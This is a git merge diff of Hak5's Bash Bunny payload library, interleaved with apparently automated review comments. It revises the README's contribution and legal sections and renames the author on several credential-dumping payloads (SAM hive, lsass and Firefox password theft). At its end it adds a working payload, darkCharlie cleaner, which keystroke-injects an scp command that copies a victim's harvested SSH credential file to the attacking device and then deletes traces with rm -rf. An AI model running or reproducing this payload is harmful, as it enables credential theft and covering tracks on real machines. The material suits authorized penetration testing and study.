Merge branch 'hak5:master' into master
commit a57046358b
261
README.md
@ -1,45 +1,242 @@
|
|||
# Payload Library for the Bash Bunny by Hak5
|
||||
# Payload Library for the [Bash Bunny](https://shop.hak5.org/products/bash-bunny) by [Hak5](https://hak5.org)
|
||||
|
||||
This repository contains payloads and extensions for the Hak5 Bash Bunny. Community developed payloads are listed and developers are encouraged to create pull requests to make changes to or submit new payloads.
|
||||
|
||||
## About the Bash Bunny
|
||||
**Payloads here are written in official DuckyScript™ and Bash specifically for the Bash Bunny. Hak5 does NOT guarantee payload functionality.** <a href="#legal"><b>See Legal and Disclaimers</b></a>
|
||||
|
||||
By emulating combinations of trusted USB devices — like gigabit Ethernet, serial, flash storage and keyboards — the Bash Bunny tricks computers into divulging data, exfiltrating documents, installing backdoors and many more exploits.
|
||||
- [Purchase at Hak5](https://hak5.org/products/bash-bunny "Purchase at Hak5")
|
||||
<div align="center">
|
||||
<img src="https://img.shields.io/github/forks/hak5/bashbunny-payloads?style=for-the-badge"/>
|
||||
|
||||
<img src="https://img.shields.io/github/stars/hak5/bashbunny-payloads?style=for-the-badge"/>
|
||||
<br/>
|
||||
<img src="https://img.shields.io/github/commit-activity/y/hak5/bashbunny-payloads?style=for-the-badge">
|
||||
<img src="https://img.shields.io/github/contributors/hak5/bashbunny-payloads?style=for-the-badge">
|
||||
</div>
|
||||
<br/>
|
||||
<p align="center">
|
||||
<a href="https://payloadhub.com"><img src="https://cdn.shopify.com/s/files/1/0068/2142/files/payloadhub.png?v=1652474600"></a>
|
||||
<br/>
|
||||
<a href="https://payloadhub.com/blogs/payloads/tagged/bash-bunny">View Featured Bash Bunny Payloads and Leaderboard</a>
|
||||
<br/><i>Get your payload in front of thousands. Enter to win over $2,000 in prizes in the <a href="https://hak5.org/pages/payload-awards">Hak5 Payload Awards!</a></i>
|
||||
</p>
|
||||
|
||||
<div align="center">
|
||||
<a href="https://hak5.org/discord"><img src="https://img.shields.io/discord/506629366659153951?label=Hak5%20Discord&style=for-the-badge"></a>
|
||||
|
||||
<a href="https://youtube.com/hak5"><img src="https://img.shields.io/youtube/channel/views/UC3s0BtrBJpwNDaflRSoiieQ?label=YouTube%20Views&style=for-the-badge"/></a>
|
||||
|
||||
<a href="https://youtube.com/hak5"><img src="https://img.shields.io/youtube/channel/subscribers/UC3s0BtrBJpwNDaflRSoiieQ?style=for-the-badge"/></a>
|
||||
|
||||
<a href="https://twitter.com/hak5"><img src="https://img.shields.io/badge/follow-%40hak5-1DA1F2?logo=twitter&style=for-the-badge"/></a>
|
||||
|
||||
<a href="https://instagram.com/hak5gear"><img src="https://img.shields.io/badge/Instagram-E4405F?style=for-the-badge&logo=instagram&logoColor=white"/></a>
|
||||
<br/><br/>
|
||||
|
||||
</div>
|
||||
|
||||
|
||||
# Table of contents
|
||||
<details open>
|
||||
<ul>
|
||||
<li><a href="#about-the-bash-bunny">About the Bash Bunny</a></li>
|
||||
<li><a href="#build-your-payloads-with-payloadstudio">PayloadStudio (Editor + Compiler)</a></li>
|
||||
<li><b><a href="#contributing">Contributing Payloads</a></b></li>
|
||||
<li><a href="#legal"><b>Legal and Disclaimers</b></a></li>
|
||||
</ul>
|
||||
</details>
|
||||
|
||||
|
||||
## Shop
|
||||
- [Bash Bunny Mark II](https://shop.hak5.org/products/bash-bunny "Purchase the Bash Bunny")
|
||||
- [PayloadStudio Pro](https://hak5.org/products/payload-studio-pro "Purchase PayloadStudio Pro")
|
||||
- [Shop All Hak5 Tools](https://shop.hak5.org "Shop All Hak5 Tools")
|
||||
## Getting Started
|
||||
- [Build Payloads with PayloadStudio](#build-your-payloads-with-payloadstudio) | [Getting STARTED](https://docs.hak5.org/bash-bunny/beginner-guides/ "QUICK START GUIDE") | [Your First Payload](https://docs.hak5.org/bash-bunny/writing-payloads/payload-development-basics)
|
||||
## Documentation / Learn More
|
||||
- [Documentation](https://docs.hak5.org/bash-bunny/ "Documentation")
|
||||
- [Bash Bunny Forums](https://forums.hak5.org/forum/92-bash-bunny/ "Forums")
|
||||
- Discord: [https://hak5.org/discord](https://hak5.org/discord)
|
||||
|
||||
![enter image description here](https://cdn.shopify.com/s/files/1/0068/2142/products/bash-bunny-mk2_001_c58d9658-b151-4328-af26-11eef3c47355_300x.jpg)
|
||||
## Community
|
||||
*Got Questions? Need some help? Reach out:*
|
||||
- [Discord](https://hak5.org/discord/ "Discord") | [Forums](https://forums.hak5.org/forum/92-bash-bunny/ "Forums")
|
||||
|
||||
|
||||
## Additional Links
|
||||
<b> Follow the creators </b><br/>
|
||||
<p>
|
||||
<b>Korben's Socials</b><br/>
|
||||
<a href="https://twitter.com/notkorben"><img src="https://img.shields.io/twitter/follow/notkorben?style=social"/></a>
|
||||
<a href="https://instagram.com/hak5korben"><img src="https://img.shields.io/badge/Instagram-Follow%20@hak5korben-E1306C"/></a>
|
||||
<br/>
|
||||
<b>Darren's Socials</b><br/>
|
||||
<a href="https://twitter.com/hak5darren"><img src="https://img.shields.io/twitter/follow/hak5darren?style=social"/></a>
|
||||
<a href="https://instagram.com/hak5darren"><img src="https://img.shields.io/badge/Instagram-Follow%20@hak5darren-E1306C"/></a>
|
||||
</p>
|
||||
|
||||
<br/>
|
||||
<h1><a href="https://shop.hak5.org/products/bash-bunny">About the Bash Bunny</a></h1>
|
||||
|
||||
Linux machine in a USB. By emulating combinations of trusted USB devices — like gigabit Ethernet, serial, flash storage and keyboards — the Bash Bunny tricks computers into divulging data, exfiltrating documents, installing backdoors and many more exploits.
|
||||
|
||||
|
||||
<b><div align="center">
|
||||
<br/>
|
||||
<br/><br/>
|
||||
</div></b>
|
||||
|
||||
<p align="center">
|
||||
<a href="https://www.youtube.com/watch?v=-UmvZdDxCiI">
|
||||
<img src="https://downloads.hak5.org/assets/images/productphotos/bash_bunny_mk2.png" width="500"/>
|
||||
</a>
|
||||
<br/>
|
||||
</p>
|
||||
|
||||
|
||||
<p align="center">
|
||||
<img src="https://cdn.shopify.com/s/files/1/0068/2142/files/bb_icon3_160x160.png?v=1624506236" alt="image">
|
||||
</p>
|
||||
|
||||
## <div align="center">ADVANCED ATTACKS </div>
|
||||
|
||||
For the sake of convenience, computers trust a number of devices. Flash drives, Ethernet adapters, serial devices and keyboards to name a few. These have become mainstays of modern computing. Each has their own unique attack vectors. When combined? The possibilities are limitless. The Bash Bunny is all of these things, alone – or in combination – and more!
|
||||
|
||||
<p align="center">
|
||||
<img src="https://cdn.shopify.com/s/files/1/0068/2142/files/bb_icon2_160x160.png?v=1624506369" alt="image">
|
||||
</p>
|
||||
|
||||
## <div align="center">SIMPLE PAYLOADS </div>
|
||||
|
||||
Each attack, or payload, is written in a simple Ducky Script™ language consisting of text files. This repository is home to a growing library of community developed payloads. Staying up to date with all of the latest attacks is just a matter of downloading files from git. Then loading ’em onto the Bash Bunny just as you would any ordinary flash drive.
|
||||
|
||||
<p align="center">
|
||||
<img src="https://cdn.shopify.com/s/files/1/0068/2142/files/bb_icon1_160x160.png?v=1624506437" alt="image">
|
||||
</p>
|
||||
|
||||
## <div align="center">SIMPLE POWERFUL HARDWARE </div>
|
||||
|
||||
It's a full featured Linux box that'll run your favorite tools even faster now thanks to the optimized quad-core CPU, desktop-class SSD and doubled RAM. Choose and monitor payloads with the selection switch and RGB LED. Access an unlocked root terminal via dedicated Serial console. Exfiltrate gigs of loot via MicroSD. Even remotely trigger or geofence payloads via Bluetooth.
|
||||
|
||||
|
||||
<h1><a href="https://payloadstudio.hak5.org">Build your payloads with PayloadStudio</a></h1>
|
||||
<p align="center">
|
||||
Take your DuckyScript™ payloads to the next level with this full-featured,<b> web-based (entirely client side) </b> development environment.
|
||||
<br/>
|
||||
<a href="https://payloadstudio.hak5.org"><img width="500px" src="https://cdn.shopify.com/s/files/1/0068/2142/products/payload-studio-icon_2000x.png"></a>
|
||||
<br/>
|
||||
<i>Payload studio features all of the conveniences of a modern IDE, right from your browser. From syntax highlighting and auto-completion to live error-checking and repo synchronization - building payloads for Hak5 hotplug tools has never been easier!
|
||||
<br/><br/>
|
||||
Supports your favorite Hak5 gear - USB Rubber Ducky, Bash Bunny, Key Croc, Shark Jack, Packet Squirrel & LAN Turtle!
|
||||
<br/><br/></i><br/>
|
||||
<a href="https://hak5.org/products/payload-studio-pro">Become a PayloadStudio Pro</a> and <b> Unleash your hacking creativity! </b>
|
||||
<br/>
|
||||
OR
|
||||
<br/>
|
||||
<a href="https://payloadstudio.hak5.org/community/"> Try Community Edition FREE</a>
|
||||
<br/><br/>
|
||||
<img src="https://cdn.shopify.com/s/files/1/0068/2142/files/themes1_1_600x.gif?v=1659642557">
|
||||
<br/>
|
||||
<i> Payload Studio Themes Preview GIF </i>
|
||||
<br/><br/>
|
||||
<img src="https://cdn.shopify.com/s/files/1/0068/2142/files/AUTOCOMPLETE3_600x.gif?v=1659640513">
|
||||
<br/>
|
||||
<i> Payload Studio Autocomplete Preview GIF </i>
|
||||
</p>
|
||||
|
||||
## Documentation
|
||||
Documentation on developing payloads for the Bash Bunny can be found on the [docs.hak5.org](https://docs.hak5.org/bash-bunny/) website. Guides can be found on the [Bash Bunny blog](https://hak5.org/blogs/bash-bunny).
|
||||
|
||||
## Disclaimer
|
||||
Generally, payloads may execute commands on your device. As such, it is possible for a payload to damage your device. Payloads from this repository are provided AS-IS without warranty. While Hak5 makes a best effort to review payloads, there are no guarantees as to their effectiveness. As with any script, you are advised to proceed with caution.
|
||||
|
||||
## Legal
|
||||
Payloads from this repository are provided for educational purposes only. Hak5 gear is intended for authorized auditing and security analysis purposes only where permitted subject to local and international laws where applicable. Users are solely responsible for compliance with all laws of their locality. Hak5 LLC and affiliates claim no responsibility for unauthorized or unlawful use.
|
||||
<h1><a href='https://payloadhub.com'>Contributing</a></h1>
|
||||
|
||||
<p align="center">
|
||||
<a href="https://payloadhub.com"><img src="https://cdn.shopify.com/s/files/1/0068/2142/files/payloadhub.png?v=1652474600"></a>
|
||||
<br/>
|
||||
<a href="https://payloadhub.com">View Featured Payloads and Leaderboard </a>
|
||||
</p>
|
||||
|
||||
# Please adhere to the following best practices and style guides when submitting a payload.
|
||||
|
||||
## Contributing
|
||||
Once you have developed your payload, you are encouraged to contribute to this repository by submitting a Pull Request. Reviewed and Approved pull requests will add your payload to this repository, where they may be publically available.
|
||||
|
||||
Please adhere to the following best practices and style guide when submitting a payload.
|
||||
Please include all resources required for the payload to run. If needed, provide a README.md in the root of your payload's directory to explain things such as intended use, required configurations, or anything that will not easily fit in the comments of the payload.txt itself. Please make sure that your payload is tested, and free of errors. If your payload contains (or is based off of) the work of other's please make sure to cite their work giving proper credit.
|
||||
|
||||
|
||||
### Purely Destructive payloads will not be accepted. No, it's not "just a prank".
|
||||
Subject to change. Please ensure any submissions meet the [latest version](https://github.com/hak5/usbrubberducky-payloads/blob/master/README.md) of these standards before submitting a Pull Request.
|
||||
|
||||
|
||||
|
||||
## Naming Conventions
|
||||
Please give your payload a unique, descriptive and appropriate name. Do not use spaces in payload, directory or file names. Each payload should be submit into its own directory, with `-` or `_` used in place of spaces, to one of the categories such as exfiltration, phishing, remote_access or recon. Do not create your own category.
|
||||
|
||||
## Staged Payloads
|
||||
"Staged payloads" are payloads that **download** code from some resource external to the payload.txt.
|
||||
|
||||
While staging code used in payloads is often useful and appropriate, using this (or another) github repository as the means of deploying those stages is not. This repository is **not a CDN for deployment on target systems**.
|
||||
|
||||
Staged code should be copied to and hosted on an appropriate server for doing so **by the end user** - Github and this repository are simply resources for sharing code among developers and users.
|
||||
See: [GitHub acceptable use policies](https://docs.github.com/en/site-policy/acceptable-use-policies/github-acceptable-use-policies#5-site-access-and-safety)
|
||||
|
||||
Additionally, any source code that is intended to be staged **(by the end user on the appropriate infrastructure)** should be included in any payload submissions either in the comments of the payload itself or as a seperate file. **Links to staged code are unacceptable**; not only for the reasons listed above but also for version control and user safety reasons. Arbitrary code hidden behind some pre-defined external resource via URL in a payload could be replaced at any point in the future unbeknownst to the user -- potentially turning a harmless payload into something dangerous.
|
||||
|
||||
### Including URLs
|
||||
URLs used for retrieving staged code should refer exclusively to **example.com** using a bash variable in any payload submissions [see Payload Configuration section below](https://github.com/hak5/usbrubberducky-payloads/blob/master/README.md#payload-configuration).
|
||||
|
||||
### Staged Example
|
||||
|
||||
**Example scenario: your payload downloads a script and the executes it on a target machine.**
|
||||
- Include the script in the directory with your payload
|
||||
- Provide instructions for the user to move the script to the appropriate hosting service.
|
||||
- Provide a bash variable with the placeholder example.com for the user to easily configure once they have hosted the script
|
||||
|
||||
[Simple Example of this style of payload](https://github.com/hak5/usbrubberducky-payloads/tree/master/payloads/library/exfiltration/Printer-Recon)
|
||||
|
||||
## Payload Configuration
|
||||
Be sure to take the following into careful consideration to ensure your payload is easily tested, used and maintained.
|
||||
In many cases, payloads will require some level of configuration **by the end payload user**.
|
||||
|
||||
- Abstract configuration(s) for ease of use. Use bash assignment variables where possible.
|
||||
- Remember to use PLACEHOLDERS for configurable portions of your payload - do not share your personal URLs, API keys, Passphrases, etc...
|
||||
- URLs to staged payloads SHOULD NOT BE INCLUDED. URLs should be replaced by example.com. Provide instructions on how to specific resources should be hosted on the appropriate infrastructure.
|
||||
- Make note of both REQUIRED and OPTIONAL configuration(s) in your payload using bash comments at the top of your payload or "inline" where applicable.
|
||||
|
||||
```
|
||||
Example:
|
||||
BEGINNING OF PAYLOAD
|
||||
... Payload Documentation...
|
||||
|
||||
# CONFIGURATION
|
||||
# REQUIRED - Provide URL used for Example
|
||||
MY_TARGET_URL="example.com"
|
||||
|
||||
# OPTIONAL - How long until payload starts; default 5s
|
||||
BOOT_DELAY="5000"
|
||||
|
||||
QUACK DELAY $BOOT_DELAY
|
||||
...
|
||||
QUACK STRING $MY_TARGET_URL
|
||||
...
|
||||
```
|
||||
|
||||
## Payload Documentation
|
||||
Payloads should begin with `#` bash comments specifying the title of the payload, the author, the target, and a brief description.
|
||||
|
||||
```
|
||||
Example:
|
||||
BEGINNING OF PAYLOAD
|
||||
|
||||
# Title: Example Payload
|
||||
# Author: Korben Dallas
|
||||
# Description: Opens hidden powershell and
|
||||
# Target: Windows 10
|
||||
# Props: Hak5, Darren Kitchen, Korben
|
||||
# Version: 1.0
|
||||
# Category: General
|
||||
```
|
||||
|
||||
### Naming Conventions
|
||||
Please give your payload a unique and descriptive name. Do not use spaces in payload names. Each payload should be submit into its own directory, with `-` or `_` used in place of spaces, to one of the categories such as exfiltration, phishing, remote_access or recon. Do not create your own category.
|
||||
|
||||
### Binaries
|
||||
Binaries may not be accepted in this repository. If a binary is used in conjunction with the payload, please document where it or its source may be obtained.
|
||||
|
||||
### Comments
|
||||
Payloads should begin with comments specifying at the very least the name of the payload and author. Additional information such as a brief description, the target, any dependencies / prerequisites and the LED status used is helpful.
|
||||
|
||||
Title: SMB Exfiltrator
|
||||
Description: Exfiltrates files from %userprofile%\documents via SMB
|
||||
Author: Hak5Darren
|
||||
Target: Windows XP SP3 - Latest
|
||||
Dependencies: impacket
|
||||
|
||||
### Configuration Options
|
||||
Configurable options should be specified in variables at the top of the payload.txt file
|
||||
|
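Review bot: the rewritten README in this hunk carries several sections twice and sends Bash Bunny contributors to another repository's rules. "About the Bash Bunny" appears as `## About the Bash Bunny` near the top and again as `<h1><a href="https://shop.hak5.org/products/bash-bunny">About the Bash Bunny</a></h1>` with the same "trusts a number of devices" paragraph repeated; "Contributing" is both an `<h1>` and a `## Contributing`; "Please adhere to the following best practices..." is both a `#` heading and a paragraph; "Naming Conventions" is a `##` and later a `###` with near-identical text; and `## Disclaimer` / `## Legal` are repeated further down, so the table-of-contents anchors `#contributing` and `#legal` each resolve to only the first copy. The "latest version" of the standards, the "see Payload Configuration section below" link and the "Simple Example of this style of payload" all point at `hak5/usbrubberducky-payloads`, so the configuration link should be the in-page anchor `#payload-configuration` and the example should be a payload in this repository. Smaller fixes in the same hunk: `<b><div align="center">...</div></b>` wraps a block element in an inline one; the Payload Documentation example's `# Description: Opens hidden powershell and` is cut off mid-sentence; `should be submit into` should read `should be submitted into`; `seperate` and `publically` are misspelled; and `Provide instructions on how to specific resources should be hosted` is missing a word.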
@ -72,4 +269,22 @@ Stages should be documented with comments
|
|||
|
||||
Common payload states include a `SETUP`, with may include a `FAIL` if certain conditions are not met. This is typically followed by either a single `ATTACK` or multiple `STAGEs`. More complex payloads may include a `SPECIAL` function to wait until certain conditions are met. Payloads commonly end with a `CLEANUP` phase, such as moving and deleting files or stopping services. A payload may `FINISH` when the objective is complete and the device is safe to eject or turn off. These common payload states correspond to `LED` states.
|
||||
|
||||
<h1><a href="https://hak5.org/pages/policy">Legal</a></h1>
|
||||
|
||||
Payloads from this repository are provided for educational purposes only. Hak5 gear is intended for authorized auditing and security analysis purposes only where permitted subject to local and international laws where applicable. Users are solely responsible for compliance with all laws of their locality. Hak5 LLC and affiliates claim no responsibility for unauthorized or unlawful use.
|
||||
|
||||
Bash Bunny and DuckyScript are the trademarks of Hak5 LLC. Copyright © 2010 Hak5 LLC. All rights reserved. No part of this work may be reproduced or transmitted in any form or by any means without prior written permission from the copyright owner.
|
||||
Bash Bunny and DuckyScript are subject to the Hak5 license agreement (https://hak5.org/license)
|
||||
DuckyScript is the intellectual property of Hak5 LLC for the sole benefit of Hak5 LLC and its licensees. To inquire about obtaining a license to use this material in your own project, contact us. Please report counterfeits and brand abuse to legal@hak5.org.
|
||||
This material is for education, authorized auditing and analysis purposes where permitted subject to local and international laws. Users are solely responsible for compliance. Hak5 LLC claims no responsibility for unauthorized or unlawful use.
|
||||
Hak5 LLC products and technology are only available to BIS recognized license exception ENC favorable treatment countries pursuant to US 15 CFR Supplement No 3 to Part 740.
|
||||
|
||||
See also:
|
||||
|
||||
[Hak5 Software License Agreement](https://shop.hak5.org/pages/software-license-agreement)
|
||||
|
||||
[Terms of Service](https://shop.hak5.org/pages/terms-of-service)
|
||||
|
||||
# Disclaimer
|
||||
<h3><b>As with any script, you are advised to proceed with caution.</h3></b>
|
||||
<h3><b>Generally, payloads may execute commands on your device. As such, it is possible for a payload to damage your device. Payloads from this repository are provided AS-IS without warranty. While Hak5 makes a best effort to review payloads, there are no guarantees as to their effectiveness.</h3></b>
|
||||
|
|
|
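Review bot: the closing tags on both Disclaimer headings in this hunk are crossed: `<h3><b>As with any script, you are advised to proceed with caution.</h3></b>` closes `</h3>` before `</b>`, and the second heading does the same; both should end `</b></h3>`. The Disclaimer and Legal text here also duplicates the `## Disclaimer` and `## Legal` sections added earlier in the same file (the "provided for educational purposes only" paragraph now appears twice), so one copy should be kept and the ToC `#legal` link pointed at it. Typo in the payload-states paragraph: `with may include a FAIL` should read `which may include a FAIL`.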
@ -1,7 +1,7 @@
|
|||
# Title: FireSnatcher
|
||||
# Description: Copies Wifi Keys, and Firefox Password Databases
|
||||
# Author: KarrotKak3
|
||||
# Props: saintcrossbow & 0iphor13
|
||||
# Props: saintcrossbow & 0i41E
|
||||
# Version: 1.0.2.0 (Work in Progress)
|
||||
# Category: Credentials
|
||||
# Target: Windows (Logged in)
|
||||
|
|
|
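Review bot: only the `# Props:` credit changes in this header (`0iphor13` to `0i41E`), which matches the other files in this merge, but the unchanged `# Version: 1.0.2.0 (Work in Progress)` line sits oddly in a published payload given the README rule in this same merge that submissions be tested and free of errors; either drop the "Work in Progress" marker or state in the payload's README what is still incomplete.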
@ -1,7 +1,7 @@
|
|||
# Title: FireSnatcher
|
||||
# Description: Copies Wifi Keys, and Firefox Password Databases
|
||||
# Author: KarrotKak3
|
||||
# Props: saintcrossbow & 0iphor13
|
||||
# Props: saintcrossbow & 0i41E
|
||||
# Version: 1.0.2.0 (Work in Progress)
|
||||
# Category: Credentials
|
||||
# Target: Windows (Logged in)
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
**Title: HashDumpBunny**
|
||||
|
||||
Author: 0iphor13
|
||||
Author: 0i41E
|
||||
|
||||
Version: 1.0
|
||||
|
||||
|
@ -17,4 +17,4 @@ Place BunnyDump.bat in the same payload switch-folder as your payload.txt
|
|||
#
|
||||
Plug in BashBunny.
|
||||
Exfiltrate the out.txt file and try to crack the hashes.
|
||||
![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/credentials/HashDumpBunny/censoredhash.png)
|
||||
![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/credentials/HashDumpBunny/censoredhash.png)
|
||||
|
|
|
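Review bot: the screenshot link in this hunk now points at `github.com/0i41E/bashbunny-payloads/blob/master/.../censoredhash.png`, a personal fork, so the image breaks the next time that account or fork is renamed (which is exactly what this change is repairing). Commit `censoredhash.png` into `payloads/library/credentials/HashDumpBunny/` in this repository and reference it relatively, e.g. `![alt text](censoredhash.png)`.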
@ -2,7 +2,7 @@
|
|||
#
|
||||
# Title: HashDumpBunny
|
||||
# Description: Dump user hashes with this script, which was obfuscated with multiple layers.
|
||||
# Author: 0iphor13
|
||||
# Author: 0i41E
|
||||
# Version: 1.0
|
||||
# Category: Credentials
|
||||
# Attackmodes: HID, Storage
|
||||
|
|
|
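Review bot: the `# Description` line kept in this header says the script "was obfuscated with multiple layers", which conflicts with the contributing rules added in the README of this same merge: staged code is to be included in readable form so users can see what will run on the target, and the disclaimer relies on Hak5 being able to review payloads. The author change itself is fine, but the payload should also ship an un-obfuscated copy of `BunnyDump.bat` (or a plain description of what it does) so reviewers and end users can verify it.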
@ -1,6 +1,6 @@
|
|||
**Title: MiniDumpBunny**
|
||||
|
||||
Author: 0iphor13
|
||||
Author: 0i41E
|
||||
|
||||
Version: 1.0
|
||||
|
||||
|
@ -14,4 +14,4 @@ What is MiniDumpBunny?
|
|||
Plug in your BashBunny equipped with the obfuscated MiniBunny.bat file, wait a few seconds, go away.
|
||||
#
|
||||
Exfiltrate the .dmp file and read it with Mimikatz.
|
||||
![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/credentials/MiniDumpBunny/mimi.png)
|
||||
![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/credentials/MiniDumpBunny/mimi.png)
|
|
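Review bot: the `mimi.png` link in this hunk moves from one personal fork URL to another (`github.com/0i41E/bashbunny-payloads/blob/master/...`), so it stays fragile; commit the image under `payloads/library/credentials/MiniDumpBunny/` in this repository and use a relative path such as `![alt text](mimi.png)` so the README does not depend on an external account name.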
@ -2,7 +2,7 @@
|
|||
#
|
||||
# Title: MiniDumpBunny
|
||||
# Description: Dump lsass with this script, which was obfuscated with multiple layers.
|
||||
# Author: 0iphor13
|
||||
# Author: 0i41E
|
||||
# Version: 1.0
|
||||
# Category: Credentials
|
||||
# Attackmodes: HID, Storage
|
||||
|
|
|
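Review bot: as with HashDumpBunny, the unchanged `# Description` line here advertises a script "obfuscated with multiple layers" (`MiniBunny.bat` per the README), which the contributing rules added in this merge do not allow for staged code; please include a readable copy of the batch file or document its exact behaviour alongside the author change.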
@ -1,6 +1,6 @@
|
|||
**Title: ProcDumpBunny**
|
||||
|
||||
Author: 0iphor13
|
||||
Author: 0i41E
|
||||
|
||||
Version: 1.0
|
||||
|
||||
|
@ -12,10 +12,10 @@ What is ProcDumpBunny?
|
|||
**Instruction:**
|
||||
|
||||
Download ProcDump from Microsoft - https://docs.microsoft.com/en-us/sysinternals/downloads/procdump - rename the Executeable to Bunny.exe
|
||||
![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/credentials/ProcDumpBunny/Screenshot%20(38).png)
|
||||
![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/credentials/ProcDumpBunny/Screenshot%20(38).png)
|
||||
Place Bunny.exe in the same payload switch as your payload
|
||||
![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/credentials/ProcDumpBunny/Screenshot%20(37).png)
|
||||
![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/credentials/ProcDumpBunny/Screenshot%20(37).png)
|
||||
#
|
||||
Plug in BashBunny.
|
||||
Exfiltrate the out.dmp file and read it with Mimikatz.
|
||||
![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/credentials/ProcDumpBunny/Screenshot%20(39).png)
|
||||
![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/credentials/ProcDumpBunny/Screenshot%20(39).png)
|
||||
|
|
|
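Review bot: the three `Screenshot%20(3x).png` links in this hunk point at the `0i41E/bashbunny-payloads` fork rather than this repository; commit the images into `payloads/library/credentials/ProcDumpBunny/` and reference them relatively so the README survives further account renames. While touching these lines, `rename the Executeable to Bunny.exe` should read `Executable`.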
@ -2,7 +2,7 @@
|
|||
#
|
||||
# Title: ProcDumpBunny
|
||||
# Description: Dump lsass.exe with a renamed version of procdump
|
||||
# Author: 0iphor13
|
||||
# Author: 0i41E
|
||||
# Version: 1.0
|
||||
# Category: Credentials
|
||||
# Attackmodes: HID, Storage
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
**Title: SamDumpBunny**
|
||||
|
||||
<p>Author: 0iphor13<br>
|
||||
<p>Author: 0i41E<br>
|
||||
OS: Windows<br>
|
||||
Version: 1.0<br>
|
||||
|
||||
|
@ -21,4 +21,4 @@ Afterwards you can use a tool like samdump2 to extract the users hashes.</p>
|
|||
|
||||
**!Disclaimer! samdump2 has proven to be unreliable in the recent past.**
|
||||
|
||||
![alt text](https://github.com/0iphor13/omg-payloads/blob/master/payloads/library/credentials/SamDumpCable/sam.png)
|
||||
![alt text](https://github.com/0i41E/omg-payloads/blob/master/payloads/library/credentials/SamDumpCable/sam.png)
|
||||
|
|
|
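Review bot: the `sam.png` link in this hunk points at `0i41E/omg-payloads/.../SamDumpCable/sam.png`, i.e. a different project (the O.MG cable port) in a personal fork, not the Bash Bunny payload this README documents; copy the image into `payloads/library/credentials/SamDumpBunny/` here and reference it relatively.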
@ -2,7 +2,7 @@
|
|||
#
|
||||
# Title: SamDumpBunny
|
||||
# Description: Dump users sam and system hive and exfiltrate them. Afterwards you can use a tool like samdump2, to get the users hashes.
|
||||
# Author: 0iphor13
|
||||
# Author: 0i41E
|
||||
# Version: 1.0
|
||||
# Category: Credentials
|
||||
# Attackmodes: HID, Storage
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
**Title: SessionBunny**
|
||||
|
||||
Author: 0iphor13
|
||||
Author: 0i41E
|
||||
(Credit for SessionGopher: Brandon Arvanaghi)
|
||||
|
||||
Version: 1.0
|
||||
|
@ -19,4 +19,4 @@ Place SessionBunny.ps1 in the same payload switch-folder as your payload.txt
|
|||
#
|
||||
Plug in BashBunny.
|
||||
Wait for the script to finish and decide what you wanna do with the information gathered
|
||||
![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/credentials/SessionBunny/censorepic.png)
|
||||
![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/credentials/SessionBunny/censorepic.png)
|
||||
|
|
|
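Review bot: the `censorepic.png` link in this hunk still resolves through a personal fork (`github.com/0i41E/bashbunny-payloads/blob/master/...`); commit the screenshot into `payloads/library/credentials/SessionBunny/` in this repository and use a relative path so the README no longer depends on the contributor's account name.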
@ -43,7 +43,7 @@
|
|||
o
|
||||
o_
|
||||
/ ". SessionGopher
|
||||
," _-" Bunny Edition (0iphor13)
|
||||
," _-" Bunny Edition (0i41E)
|
||||
," m m
|
||||
..+ ) Brandon Arvanaghi
|
||||
`m..m @arvanaghi | arvanaghi.com
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# Title: SessionBunny
|
||||
# Author: 0iphor13
|
||||
# Author: 0i41E
|
||||
# Version: 1.0
|
||||
# Category: Credentials
|
||||
# Attackmodes: HID, Storage
|
||||
|
|
|
@ -0,0 +1,74 @@
|
|||
#!/bin/bash
|
||||
|
||||
# Title: darkCharlie{Cleaner}
|
||||
# Author: Michael Weinstein
|
||||
# Target: Mac/Linux
|
||||
# Version: 0.1
|
||||
#
|
||||
# Get the ssh creds from our loot collection.
|
||||
# And clean up after
|
||||
#
|
||||
# White | Ready
|
||||
# Blue blinking | Attacking
|
||||
# Green | Finished
|
||||
|
||||
LED SETUP
|
||||
|
||||
#setup the attack on macos (if false, attack is for Linux)
|
||||
mac=false
|
||||
|
||||
if [ "$mac" = true ]
|
||||
then
|
||||
ATTACKMODE ECM_ETHERNET HID VID_0X05AC PID_0X021E
|
||||
else
|
||||
ATTACKMODE ECM_ETHERNET HID
|
||||
fi
|
||||
|
||||
DUCKY_LANG us
|
||||
|
||||
GET SWITCH_POSITION
|
||||
GET HOST_IP
|
||||
|
||||
cd /root/udisk/payloads/$SWITCH_POSITION/
|
||||
LOOT=/root/udisk/loot/darkCharlie
|
||||
mkdir -p $LOOT
|
||||
|
||||
LED ATTACK
|
||||
|
||||
if [ "$mac" = true ]
|
||||
then
|
||||
RUN OSX terminal
|
||||
else
|
||||
RUN UNITY xterm
|
||||
fi
|
||||
QUACK DELAY 2000
|
||||
|
||||
QUACK STRING scp -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no \~/.config/ssh/ssh.conf root@$HOST_IP:$LOOT/\$USER.$HOSTNAME.ssh.passwd.json #nice hiding of known host info
|
||||
QUACK DELAY 200
|
||||
QUACK ENTER
|
||||
QUACK DELAY 500
|
||||
QUACK STRING hak5bunny
|
||||
QUACK DELAY 200
|
||||
QUACK ENTER
|
||||
QUACK DELAY 500
|
||||
if [ "$mac" = true ]
|
||||
then
|
||||
QUACK STRING rm -rf \~/.config/ssh #\&\& sed -i \'/export PATH=\\~\\/.config\\/ssh:/d\' \~/.bash_profile #macs really seem to hate it when you sed in place, I think.
|
||||
QUACK ENTER
|
||||
